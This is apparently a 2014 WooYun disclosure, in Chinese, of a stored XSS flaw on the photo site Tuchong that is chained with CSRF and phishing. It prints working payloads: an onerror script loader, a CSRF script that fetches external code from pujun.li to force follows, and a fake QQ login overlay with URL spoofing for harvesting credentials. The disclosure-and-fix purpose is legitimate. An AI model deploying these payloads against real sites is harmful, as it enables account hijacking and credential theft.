漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-070457
漏洞标题:图虫网存储型XSS + CSRF + Phishing 即使有httponly 照样玩的飞起
相关厂商:图虫网
漏洞作者: 0x_Jin
提交时间:2014-07-31 15:21
修复时间:2014-09-14 15:22
公开时间:2014-09-14 15:22
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-07-31: 细节已通知厂商并且等待厂商处理中
2014-08-01: 厂商已经确认,细节仅向厂商公开
2014-08-11: 细节向核心白帽子及相关领域专家公开
2014-08-21: 细节向普通白帽子公开
2014-08-31: 细节向实习白帽子公开
2014-09-14: 细节向公众公开
简要描述:
之前有蛮多图虫的存储型XSS的 但是都差不多忘了 今天又去找了找。。。但是忘记你们做了httponly了 但是木有关系 即使这样 还有csrf 等等可以玩
详细说明:
在图虫首页 - 讨论 选择任意一个社区 - 发帖子
在标题处 填入 xss payload (在帖子本身的界面已做过滤 在帖子综合界面没做过滤)
上图吧:
未做过滤
已做过滤的帖子本身界面:
再截图一下csrf发出去的包:
再截图一下关注者的界面:
危害不止这么一点点喔。。不要以为做了http only 就安全了。。。
xss还可以做钓鱼哦 亲~ 由于我不是真的想去钓鱼tuchong 我就拿qq空间钓鱼的模板来演示下把
上张图吧:
这个也是用html+css写出来的 稍微花点时间 改改就可以改的跟你们首页的登录框一模一样!
连接在此:http://photogear.tuchong.com/
XSS代码贴上:
<img src=x onerror=jQuery.getScript('hook Address') width=0px> (不让图片显示出来)
csrf代码贴上:
var csrf = function(){
var target="http://capa.tuchong.com/api/site/follow/";
var siteid="site_id=377467";
xss.csrf(target,siteid);
};
if('xss' in window){
csrf();
}else{
var s = document.createElement('script');
s.onload = csrf;
s.src = '//pujun.li/xss.js';
document.body.appendChild(s);
}
钓鱼代码贴上:location.href='javascript:\'<html><head></head><body><div style="position: absolute; top: 322px; left: 599px; width: 402px; height: 256px; z-index: 9999; background-image: url(http://xssreport.sinaapp.com/t/qbg.png); background-position: initial initial; background-repeat: no-repeat no-repeat;"><input type="text" style="position:absolute;top:50px;left:108px;border:none;width:197px;height:24px;line-height:24px;" id="user"><input type="password" style="position:absolute;top:92px;left:108px;border:none;width:197px;height:24px;line-height:24px;" id="pass"><div onclick="sendlogin()" style="position:absolute;top:136px;left:105px;border:none;width:101px;height:28px;cursor:pointer;"></div><img id="upic" style="display:none"></div></body></html>\'';
history.pushState({},"xxx","/cgi-bin/loginpage");
漏洞证明:
http://pentax.tuchong.com/
http://tuchong.com/642/
http://tuchong.com/643/
钓鱼连接:http://photogear.tuchong.com/
虽然访问上面任意一个连接都会发出关注我的包。。。
修复方案:
在帖子本身界面过滤 在帖子显示标题的界面也要过滤哦 亲~ 给个高分吧 图虫的前端漏洞还蛮多的!
输入输出进行过滤!一个存储型xss能做很多事情。。。什么获取内网ip 扫描内网 获取网页截图 以及环境信息就不演示了 毕竟这只是一个sns应用的xss
版权声明:转载请注明来源 0x_Jin@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2014-08-01 13:58
厂商回复:
已经修复,谢谢
最新状态:
暂无